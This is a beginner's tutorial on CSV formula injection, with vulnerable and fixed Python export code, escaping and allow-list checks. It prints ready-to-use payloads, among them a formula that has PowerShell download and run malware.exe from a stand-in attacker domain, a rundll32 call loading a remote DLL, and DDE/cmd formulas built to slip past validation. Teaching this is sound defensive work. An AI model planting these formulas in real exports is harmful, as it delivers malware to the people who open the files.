CSV Injection Tutorial for Beginner Developers (with examples)

Developers often work with CSV (Comma Separated Values) files to transfer data between platforms or to let users download data for use in their favorite application. CSV files are just text files where each value in a record is separated by a comma. As a developer, you often need to add data export functionality to your application, but you must also consider that this functionality could introduce vulnerabilities, namely CSV injection (also known as formula injection).

The data exported to a CSV file can be basic text, or it could be malicious formulas. Excel lets users create macros and formulas, which are generally used to perform mathematical calculations, but they can also be used to open a program or download data. With malicious formulas, however, your export functionality could be used to download and run malware on a local machine, make external network calls, display malicious links to phishing sites, or steal data and send it to an attacker.

How Does Formula Injection Happen?

Most developers work with Excel or CSV file generation when they build reports or logging tools that also have an export feature. Users with all kinds of permissions on the network look at reports on their screens and then click a button to export data to a CSV file. They can then use this file to build their own reports in Excel, Word, or PowerPoint. They aren’t aware that this functionality could be used to load malware on their system.

Custom logging tools used to monitor user input will take a snapshot of input and store it in files. For example, suppose that you want to capture authentication requests, both successful and failed. You might write a username to the file to determine which user authenticated or tried to authenticate. Note: You should never write passwords to logs. You can then build reports for administrators to review and detect suspicious authentication behavior. Administrators are high-privilege users, so an attacker could use this vulnerability to steal sensitive data or install malware on critical systems.

If you don’t validate data before exporting it, the export functionality could be used to compromise the system. Let’s say you use this Python snippet to write user input to a CSV file:

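# Attacker-supplied "username" that is really a malicious formula
user_input = "=cmd|'/C powershell IEX(wget myransomwaresite.com/malware.exe)'!A0"

# Vulnerable: the input is written to the CSV file without validation or escaping
with open("users.csv", "w") as logged_authenticated_users:
    logged_authenticated_users.write(user_input)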

In the above code, the user input is a malicious Excel formula that wraps a PowerShell command, and it is written to the CSV file unchanged. The command downloads the file malware.exe from the attacker-controlled domain myransomwaresite.com. When a user opens the CSV file in Excel, the formula is evaluated, PowerShell is invoked, and the file is downloaded. Excel may show a security prompt first, but users who trust the source of the file often click through it.

This is a simplistic example, but the same technique could be used to install malware on the local machine. Once an attacker realizes that user input ends up in exported data, they would get to work entering these types of values.
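The same problem appears when the export goes through Python's csv module, because CSV quoting protects the structure of the file, not the spreadsheet that opens it. The following is a minimal sketch, assuming a hypothetical export_users helper and a harmless calculator payload standing in for the attacker's input:

```python
import csv
import io

def export_users(usernames):
    """Hypothetical export helper: writes one username per row, unmodified."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    writer.writerow(["username"])
    for name in usernames:
        writer.writerow([name])  # no validation or escaping: vulnerable
    return buffer.getvalue()

# Harmless stand-in for an attacker-supplied username.
payload = "=cmd|'/C calc'!A0"
csv_text = export_users(["alice", payload])

# Reading the file back shows the formula survived the round trip intact.
rows = list(csv.reader(io.StringIO(csv_text)))
print(rows[2][0])
```

The cell still begins with an equals sign after the round trip, so a spreadsheet application would treat it as a formula rather than as text.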

What Can Be Done with a CSV Injection Attack

At first, you might think that opening a program on the local machine is not a big issue, but so much more can be done with a successful CSV injection attack. In the previous section, you saw example input that could be used to download a malicious file. Here are a few more scenarios that would benefit an attacker:

Automatically download malware and install it on the local machine. For example, install ransomware to cripple the organization and demand a large payment.
Credential theft. The HYPERLINK Excel function creates a link in the spreadsheet. A malicious link could lead to an attacker-controlled server where users can be tricked into entering their credentials, either for corporate applications or public ones (e.g., Google account information to authenticate into a user’s Google Drive).
Stolen data. If the file is opened in Google Sheets, the IMPORTXML function could be used to pull data from a corporate Google document (e.g., a spreadsheet) and send it to the attacker.
Launch a distributed denial-of-service (DDoS) attack. An injected formula can run basic commands from the command line, so the ping command could be used to target a victim server. With enough users opening the CSV file at the same time, it could put heavy strain on the target server and cause issues with performance and functionality.

Example CSV Injection Payloads

Using the four scenarios above, here are example payloads that you might see used in a formula injection attack. The payloads below are what the attacker would try to inject into a CSV file.

The below code silently downloads malware.exe from the attacker’s ransomware site using PowerShell.

=cmd|'/C powershell IEX(wget myransomwaresite.com/malware.exe)'!A0

The below code executes a remote DLL file 1.dll from the share \\10.0.0.1\3\2\.

=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

The following command opens Notepad. Although Notepad is not a malicious program, this formula can be used to run other programs on the local machine.

=cmd|' /C notepad'!'A1'

The following formula can be used to bypass specific code validation that ensures there is a valid math formula present. It bypasses validation and executes the user’s calculator program.

=10+20+cmd|' /C calc'!A0

The following formula uses the Excel Dynamic Data Exchange (DDE) to run a program, specifically opening the local machine’s calculator program.

DDE ("cmd";"/C calc";"!A0")A0

The following formula looks like a simple SUM formula but it appends a command that will open the local machine’s calculator.

@SUM(1+9)*cmd|' /C calc'!A0

How to Code for CSV Injection Mitigation?

To check whether your code is vulnerable to formula injection, use your application as if you’re a user and enter the following as input:

=cmd|'/C calc.exe'!A0

Export data to a CSV and open it in Excel. If the calculator opens, then you know that your application is vulnerable.
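The manual check can be complemented by an automated one that scans exported CSV text for cells a spreadsheet might evaluate. This is only a sketch: find_formula_cells is a hypothetical helper, and the set of trigger characters (=, +, -, @) is an assumption based on the characters commonly treated as formula prefixes.

```python
import csv
import io

# Assumed set of characters that can make a spreadsheet evaluate a cell.
TRIGGERS = ("=", "+", "-", "@")

def find_formula_cells(csv_text):
    """Return (row, column, value) for every cell that starts with a trigger."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(TRIGGERS):
                hits.append((r, c, cell))
    return hits

# Sample export containing the test payload in the username column.
exported = "username,status\r\nalice,ok\r\n=cmd|'/C calc.exe'!A0,failed\r\n"
print(find_formula_cells(exported))
```

A check like this could run in a test suite against the output of the export feature, so a regression shows up without anyone opening Excel.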

The first step is to determine if Excel special characters should be allowed as input. For example, if you’re logging usernames and they are not allowed to have special characters in them, then blacklist the characters that can start a formula, such as the equals sign (=), plus sign (+), minus sign (-), and at sign (@), from being exported or (even better) being stored.

For any exportable data, always escape values that begin with a special character by prefixing them with a single quote character ( ' ). For example, the above payload would become:

'=cmd|'/C calc.exe'!A0

By escaping special characters, you tell Excel to print the formula as simple text, and it won’t execute the formula.
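In Python, the escaping step might look like the sketch below. The names escape_cell and export_rows are hypothetical, and the list of trigger characters is an assumption rather than a complete rule set.

```python
import csv
import io

# Assumed set of characters that can make a spreadsheet evaluate a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

def escape_cell(value):
    """Prefix a single quote so spreadsheets treat the cell as plain text."""
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text

def export_rows(rows):
    """Write rows to CSV text, escaping every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    for row in rows:
        writer.writerow([escape_cell(cell) for cell in row])
    return buffer.getvalue()

print(export_rows([["alice", "ok"], ["=cmd|'/C calc.exe'!A0", "failed"]]))
```

Treating a leading minus sign as a trigger also escapes negative numbers, so a real export might apply escape_cell only to free-text columns.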

With a combination of blacklisting certain characters, whitelisting only allowed domains, and escaping special characters exported to CSV files, you can make your code safer from this attack.
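For the username example, the input filtering side of that combination can be sketched as an allow-list check applied before the value is stored. The policy here (3 to 32 characters, starting with a letter or digit) is an assumption for illustration, and is_valid_username is a hypothetical helper.

```python
import re

# Assumed policy: 3-32 characters made of letters, digits, dot, underscore,
# or hyphen, and the first character must be a letter or digit.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{2,31}")

def is_valid_username(username):
    """Return True only if the whole username matches the allow-list."""
    return USERNAME_PATTERN.fullmatch(username) is not None

for candidate in ["alice.smith", "=cmd|'/C calc.exe'!A0", "@admin"]:
    print(candidate, is_valid_username(candidate))
```

Because the first character must be a letter or digit, none of the payloads shown earlier would pass this check. Escaping on export is still worth keeping as a second layer for fields that cannot be restricted this tightly.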